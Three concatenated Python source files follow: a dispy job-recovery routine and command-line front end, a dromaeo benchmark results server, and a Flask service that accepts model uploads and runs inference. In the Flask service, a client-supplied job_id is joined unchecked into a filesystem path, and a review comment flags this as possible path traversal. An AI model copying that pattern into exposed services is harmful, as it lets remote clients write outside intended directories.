            job.end_time = reply.end_time
            job.status = reply.status
            job.ip_addr = reply.ip_addr
            job.finish.set()
            pending['jobs'].append(job)
            pending['count'] -= 1
            if pending['count'] == 0 and pending['resend_req_done'] is True:
                pending['complete'].set()
        else:
            logger.debug('Invalid TCP message from %s ignored', addr[0])
        conn.close()

    def tcp_server(ip_addr, pending, task=None):
        # Accept connections from nodes delivering job replies.
        task.set_daemon()
        addrinfo = node_addrinfo(ip_addr)
        sock = AsyncSocket(socket.socket(addrinfo.family, socket.SOCK_STREAM),
                           keyfile=cluster['keyfile'], certfile=cluster['certfile'])
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((ip_addr, cluster['port']))
        sock.listen(32)
        while 1:
            if pending['timeout']:
                timeout = pending['timeout'] - (time.time() - pending['start_time'])
                if timeout <= 0:
                    # Deadline reached: signal completion but keep polling
                    # briefly for stragglers.
                    pending['complete'].set()
                    timeout = 2
                sock.settimeout(timeout)
            try:
                conn, addr = yield sock.accept()
            except ssl.SSLError as err:
                logger.debug('SSL connection failed: %s', str(err))
                continue
            except GeneratorExit:
                break
            except socket.timeout:
                continue
            except:
                continue
            else:
                Task(tcp_req, conn, addr, pending)
        raise StopIteration

    def resend_requests(pending, task=None):
        # Ask every node of every computation to resend results of jobs it
        # still holds; count how many replies to expect.
        for compute_id, compute in list(computes.items()):
            if pending['timeout'] and \
               ((time.time() - pending['start_time']) > pending['timeout']):
                break
            req = {'compute_id': compute_id, 'auth': compute['auth']}
            for ip_addr in compute['nodes']:
                node = nodes.get(ip_addr, None)
                if not node:
                    continue
                reply = yield node.send(b'RESEND_JOB_RESULTS:' + serialize(req))
                try:
                    reply = deserialize(reply)
                    assert isinstance(reply, int)
                except:
                    logger.warning('Invalid resend reply from %s', ip_addr)
                    continue
                logger.debug('Pending jobs from %s for %s: %s',
                             node.ip_addr, compute['name'], reply)
                if reply == 0:
                    # Nothing pending on this node: close it right away.
                    req['node_ip_addr'] = ip_addr
                    yield node.send(b'CLOSE:' + serialize(req), reply=True,
                                    task=task)
                else:
                    pending['count'] += reply
        pending['resend_req_done'] = True
        if pending['count'] == 0:
            pending['complete'].set()

    # Shared state between tcp_req / tcp_server / resend_requests.
    pending = {'count': 0, 'resend_req_done': False, 'jobs': [],
               'complete': threading.Event(), 'timeout': timeout,
               'start_time': time.time()}
    for ip_addr in cluster['ip_addrs']:
        if not ip_addr:
            ip_addr = ''
        Task(tcp_server, ip_addr, pending)
    Task(resend_requests, pending)
    # Block until all expected replies arrived or the timeout elapsed.
    pending['complete'].wait()

    # Close all nodes (except those managed by a shared scheduler) so they
    # can serve new clients.
    for compute_id, compute in computes.items():
        req = {'compute_id': compute_id, 'auth': compute['auth'],
               'terminate_pending': terminate_pending}
        for ip_addr in compute['nodes']:
            node = nodes.get(ip_addr, None)
            if not node:
                continue
            if node.scheduler_ip_addr:
                continue
            req['node_ip_addr'] = ip_addr
            Task(node.send, b'CLOSE:' + serialize(req), reply=True)

    if terminate_pending:
        # wait a bit to get cancelled job results
        for x in range(10):
            if pending['count'] == 0 and pending['resend_req_done'] is True:
                break
            time.sleep(0.2)

    pycos_scheduler.finish()
    # Remove the recover file only if everything was recovered; otherwise
    # leave it so recovery can be retried.
    if pending['count'] == 0 and pending['resend_req_done'] is True:
        for ext in ('', '.db', '.bak', '.dat', '.dir'):
            if os.path.isfile(recover_file + ext):
                try:
                    os.remove(recover_file + ext)
                except:
                    pass
    return pending['jobs']


if __name__ == '__main__':
    # Command-line front end: distribute a program with dispy and print the
    # result of each submitted job.
    import argparse

    logger.info('dispy version %s', _dispy_version)

    parser = argparse.ArgumentParser()
    parser.add_argument('computation', help='program to distribute and parallelize')
    parser.add_argument('-c', action='store_false', dest='cleanup', default=True,
                        help='if True, nodes will remove any files transferred when '
                        'this computation is over')
    parser.add_argument('-d', '--debug', action='store_true', dest='loglevel', default=False,
                        help='if given, debug messages are printed')
    parser.add_argument('-a', action='append', dest='args', default=[],
                        help='argument(s) to program; repeat for multiple instances')
    parser.add_argument('-f', action='append', dest='depends', default=[],
                        help='dependencies (files) needed by program')
    parser.add_argument('-n', '--nodes', action='append', dest='nodes', default=[],
                        help='list of nodes (names or IP address) acceptable for this computation')
    parser.add_argument('--ip_addr', dest='ip_addr', default=None,
                        help='IP address of this client')
    parser.add_argument('--secret', dest='secret', default='',
                        help='authentication secret for handshake with nodes')
    parser.add_argument('--certfile', dest='certfile', default='',
                        help='file containing SSL certificate')
    parser.add_argument('--keyfile', dest='keyfile', default='',
                        help='file containing SSL key')
    parser.add_argument('--scheduler_node', dest='scheduler_node', default=None,
                        help='name or IP address where dispyscheduler is running to which '
                        'jobs are submitted')

    config = vars(parser.parse_args(sys.argv[1:]))

    if config['loglevel']:
        logger.setLevel(logger.DEBUG)
        pycos.logger.setLevel(logger.DEBUG)
    else:
        logger.setLevel(logger.INFO)
    del config['loglevel']

    # Empty cert/key paths become None; non-empty ones are made absolute.
    if config['certfile']:
        config['certfile'] = os.path.abspath(config['certfile'])
    else:
        config['certfile'] = None
    if config['keyfile']:
        config['keyfile'] = os.path.abspath(config['keyfile'])
    else:
        config['keyfile'] = None

    args = config.pop('args')

    # A scheduler node implies a shared cluster; otherwise run standalone.
    if config['scheduler_node']:
        cluster = SharedJobCluster(**config)
    else:
        del config['scheduler_node']
        cluster = JobCluster(**config)

    jobs = []
    for n, arg in enumerate(args, start=1):
        # Each '-a' value is split on whitespace into program arguments.
        job = cluster.submit(*(arg.split()))
        job.id = n
        jobs.append((job, arg))

    for job, args in jobs:
        job()
        # NOTE(review): 'args' is the original argument string here, so this
        # join of its characters yields the same string; presumably a
        # separator was intended -- confirm.
        sargs = ''.join(arg for arg in args)
        if job.exception:
            print('Job %s with arguments "%s" failed with "%s"' %
                  (job.id, sargs, job.exception))
            continue
        if job.result:
            print('Job %s with arguments "%s" exited with: "%s"' %
                  (job.id, sargs, str(job.result)))
        if job.stdout:
            print('Job %s with arguments "%s" produced output: "%s"' %
                  (job.id, sargs, job.stdout))
        if job.stderr:
            print('Job %s with argumens "%s" produced error messages: "%s"' %
                  (job.id, sargs, job.stderr))

    cluster.print_status()
    exit(0)
dromaeo.py
#!python
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Serves the dromaeo benchmark from a ZIP archive and collects its results.

The benchmark page POSTs its metrics back as JSON; the server stores them
and the main thread prints them once available (or times out).

NOTE: this script targets Python 2 (it uses the 'urlparse' module and
py2-only mimetools-style headers); the syntax below is kept py2.6+/py3
parseable, but it must run under Python 2.
"""

import json
import optparse
import sys
import threading
import urlparse

import zip_http_server


# The set of address values that map to 'localhost'.
_LOCALHOST_ADDRESSES = (None, '', '0.0.0.0', '127.0.0.1')


class RequestHandler(zip_http_server.ZipFileRequestHandler):
    """A request handler class that handles incoming JSON post requests by
    storing the metrics and shutting down the server."""

    def do_POST(self):
        """A handler for the POST method.

        Parses the urlencoded 'data' field as JSON, stores it on the server,
        and echoes a pretty-printed copy back; replies 400 on any failure.
        """
        post_body = None
        try:
            # Read the posted content.
            content_len = int(self.headers.getheader('content-length'))
            post_body = self.rfile.read(content_len)

            # The json is packed into a data argument.
            data = urlparse.parse_qs(post_body)['data'][0]

            # Stash the metrics in the server.
            results = json.loads(data)
            self.server.SetResults(results)

            # Send back a plain-text version of the data.
            pretty_data = json.dumps(results, sort_keys=True, indent=2)
            self.send_response(200)
            self.send_header('Content-Type', 'text/plain')
            self.send_header('Content-Length', len(pretty_data))
            self.end_headers()
            self.wfile.write(pretty_data)
        # Fixed: 'except Exception, error' is py2-only syntax; 'as' works
        # in py2.6+ and py3.
        except Exception as error:
            message = str(error)
            self.send_response(400)
            self.send_header('Content-Type', 'text/plain')
            self.send_header('Content-Length', len(message))
            self.end_headers()
            self.wfile.write(message)


class DromaeoServer(zip_http_server.HTTPZipFileServer):
    """This class implements a runnable HTTP server that serves the dromaeo
    benchmark from a ZIP archive.
    """

    def __init__(self, zip_file, address='', port=0, request_handler_class=None):
        # Use the default request handler if no over-ride is specified.
        if request_handler_class is None:
            request_handler_class = RequestHandler

        # Initialize the base class.
        server_address = (address, port)
        zip_http_server.HTTPZipFileServer.__init__(
            self, server_address, request_handler_class, zip_file)

        # The results and an event to track when they get set.
        self._results = None
        self._results_have_been_set = threading.Event()

    def Run(self):
        """Runs the HTTP server in a background thread."""
        thread = threading.Thread(target=self.serve_forever)
        thread.daemon = True
        thread.start()

    def SetResults(self, results):
        """Stores the results of the benchmark and sets an event to notify
        any other thread waiting on the results.
        """
        self._results = results
        self._results_have_been_set.set()

    def HasResults(self):
        """Returns true if the results have been set."""
        return self._results is not None

    def GetResults(self):
        """Returns the results or None."""
        return self._results

    def WaitForResults(self, timeout):
        """Blocks until results have been set, or the timeout duration
        elapses."""
        self._results_have_been_set.wait(timeout)

    def Reset(self):
        """Resets the event notification of the results being set."""
        self._results_have_been_set.clear()

    def GetUrl(self):
        """Returns the URL at which the dromaeo benchmark is running."""
        address, port = self.server_address
        if address in _LOCALHOST_ADDRESSES:
            address = 'localhost'
        return 'http://%s:%d/?dom&automated&post_json' % (address, port)

    def FormatResultsAsText(self):
        """Prints a dromaeo result set in a nicely human readable format."""
        if not self.HasResults():
            return 'None'
        sorted_results = sorted(self._results.iteritems())
        return '\n'.join('  %s : %s' % kv for kv in sorted_results)


def main(argv):
    """Parses options, serves the benchmark, and prints collected results.

    Returns 1 on timeout/interrupt (no results), falls through (exit 0)
    after printing results.
    """
    # Setup the argument parser.
    parser = optparse.OptionParser()
    parser.add_option('-a', '--address', default='', help='The address to bind.')
    parser.add_option('-p', '--port', type='int', default=0,
                      help='The port to bind (by default, the server will '
                           'randomly select an available port).')
    parser.add_option('-z', '--zip-file', default='./dramaeo.zip',
                      help='The zipfile containing the dramaeo resources '
                           '(default: %default).')
    parser.add_option('-t', '--timeout', type='int', default=300,
                      help='The maximum time to wait for results, in seconds'
                           '(default: %default).')

    # Parse the arguments.
    options, extra = parser.parse_args(argv)
    if extra:
        parser.error('Unexpected arguments: %s' % extra)

    # Create the server.
    server = DromaeoServer(zip_file=options.zip_file,
                           address=options.address,
                           port=options.port)

    # Run the server in another thread.
    print('Starting dromaeo server.')
    server.Run()
    # BUG FIX: previously called server.GetURL(), but the method defined
    # above is GetUrl() -- the old call raised AttributeError at runtime.
    print('URL: %s' % server.GetUrl())

    try:
        server.WaitForResults(options.timeout)
    except KeyboardInterrupt:
        pass
    server.shutdown()

    # Print the results to the console.
    if not server.HasResults():
        print('Timed out or interrupted while waiting for results.')
        return 1
    else:
        print(server.FormatResultsAsText())


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))
evaluate_service.py
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""The Evaluate Service of the service."""
from flask import Flask, request
from flask_restful import Resource, Api
import glob
import multiprocessing
import time
import shutil
try:
    # Older werkzeug exported secure_filename at package level.
    from werkzeug import secure_filename
except Exception:
    from werkzeug.utils import secure_filename
from class_factory import ClassFactory
from hardwares import *  # noqa F401
import datetime
import os
import logging
from config import ip_address, listen_port, optional_params, clean_interval
import traceback

app = Flask(__name__)
api = Api(app)


class Evaluate(Resource):
    """Evaluate Service for service."""

    def __init__(self):
        # Directory containing this file; uploads are stored under "<here>/out".
        self.current_path = os.path.dirname(os.path.abspath(__file__))
        # Response template. NOTE(review): "sucess" is misspelled, but
        # clients may compare against this exact string -- do not change
        # without coordinating with the client side.
        self.result = {"latency": "-1", "out_data": [], "status": "sucess", "timestamp": ""}

    def post(self):
        """Interface to response to the post request of the client.

        Saves the uploaded model/weight/data files, optionally converts the
        model for the requested hardware, runs inference 'repeat_times'
        times, and returns the average latency and output data.
        """
        self.parse_paras()
        self.upload_files()
        # Look up the hardware backend class (registered by the 'hardwares'
        # star-import) and construct it with service-level optional params.
        self.hardware_instance = ClassFactory.get_cls(self.hardware)(optional_params)
        # 'reuse_model' arrives as form text, hence the string comparison.
        if self.reuse_model == "True":
            logging.warning("Reuse the model, no need to convert the model.")
        else:
            try:
                self.hardware_instance.convert_model(backend=self.backend, model=self.model,
                                                     weight=self.weight, save_dir=self.share_dir,
                                                     input_shape=self.input_shape,
                                                     out_nodes=self.out_nodes)
            except Exception:
                # Record the failure in the response but continue; inference
                # below will then also fail and overwrite the status.
                self.result["status"] = "Model convert failed."
                logging.error("[ERROR] Model convert failed!")
                traceback.print_exc()
        try:
            latency_sum = 0
            for repeat in range(self.repeat_times):
                latency, output = self.hardware_instance.inference(converted_model=self.share_dir,
                                                                   input_data=self.input_data)
                latency_sum += float(latency)
            # Average latency over all repeats; only the last run's output
            # is returned.
            self.result["latency"] = latency_sum / self.repeat_times
            self.result["out_data"] = output
        except Exception:
            self.result["status"] = "Inference failed."
            logging.error("[ERROR] Inference failed! ")
            traceback.print_exc()
        return self.result

    def parse_paras(self):
        """Parse the parameters in the request from the client."""
        self.backend = request.form["backend"]
        self.hardware = request.form["hardware"]
        self.reuse_model = request.form["reuse_model"]
        self.job_id = request.form["job_id"]
        self.input_shape = request.form.get("input_shape", type=str, default="")
        self.out_nodes = request.form.get("out_nodes", type=str, default="")
        # NOTE(review): raises if 'repeat_times' is missing or non-numeric;
        # no validation is performed on any of these client-supplied values.
        self.repeat_times = int(request.form.get("repeat_times"))

    def upload_files(self):
        """Upload the files from the client to the service."""
        # Timestamped folder per request; shared folder per job_id.
        self.now_time = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')
        self.result["timestamp"] = self.now_time
        logging.warning("The timestamp is {}.".format(self.now_time))
        self.upload_file_path = os.path.join(self.current_path, "out", self.now_time)
        # NOTE(review): 'job_id' comes straight from the client form and is
        # joined into a filesystem path -- potential path traversal if this
        # service is exposed to untrusted clients; confirm deployment model.
        self.share_dir = os.path.join(self.current_path, "out", self.job_id)
        os.makedirs(self.upload_file_path)
        model_file = request.files.get("model_file")
        if model_file is not None:
            self.model = self.upload_file_path + "/" + secure_filename(model_file.filename)
            model_file.save(self.model)
        data_file = request.files.get("data_file")
        if data_file is not None:
            self.input_data = self.upload_file_path + "/" + secure_filename(data_file.filename)
            data_file.save(self.input_data)
        weight_file = request.files.get("weight_file")
        if weight_file is not None:
            self.weight = self.upload_file_path + "/" + secure_filename(weight_file.filename)
            weight_file.save(self.weight)
        else:
            self.weight = ""
        # NOTE(review): unlike 'weight', 'self.model'/'self.input_data' are
        # left unset when the corresponding file is absent, so post() would
        # raise AttributeError -- confirm clients always send them.
        logging.warning("upload file sucess!")
api.add_resource(Evaluate, '/')


def _clean_data_path():
    """Periodically delete stale upload folders under "<here>/out".

    Intended to run forever in a daemon process: every hour it removes any
    folder whose creation time is older than 'clean_interval' seconds, so
    uploaded models/data do not accumulate on disk.
    """
    while True:
        # Anything created before this cutoff is considered stale.
        _clean_time = time.time() - clean_interval
        _current_path = os.path.dirname(os.path.abspath(__file__))
        folder_pattern = "{}/out/*".format(_current_path)
        folders = glob.glob(folder_pattern)
        for folder in folders:
            if os.path.isdir(folder) and os.path.getctime(folder) < _clean_time:
                logging.info("remove old folder: {}".format(folder))
                try:
                    shutil.rmtree(folder)
                except Exception:
                    # Fixed: logging.warn is a deprecated alias of
                    # logging.warning.
                    logging.warning("failed to remove {}".format(folder))
        time.sleep(3600)


if __name__ == '__main__':
    # Run the cleaner as a daemon process so it terminates with the server.
    p = multiprocessing.Process(target=_clean_data_path, daemon=True)
    p.start()
    # threaded=False: evaluation requests are handled one at a time.
    app.run(host=ip_address, port=listen_port, threaded=False)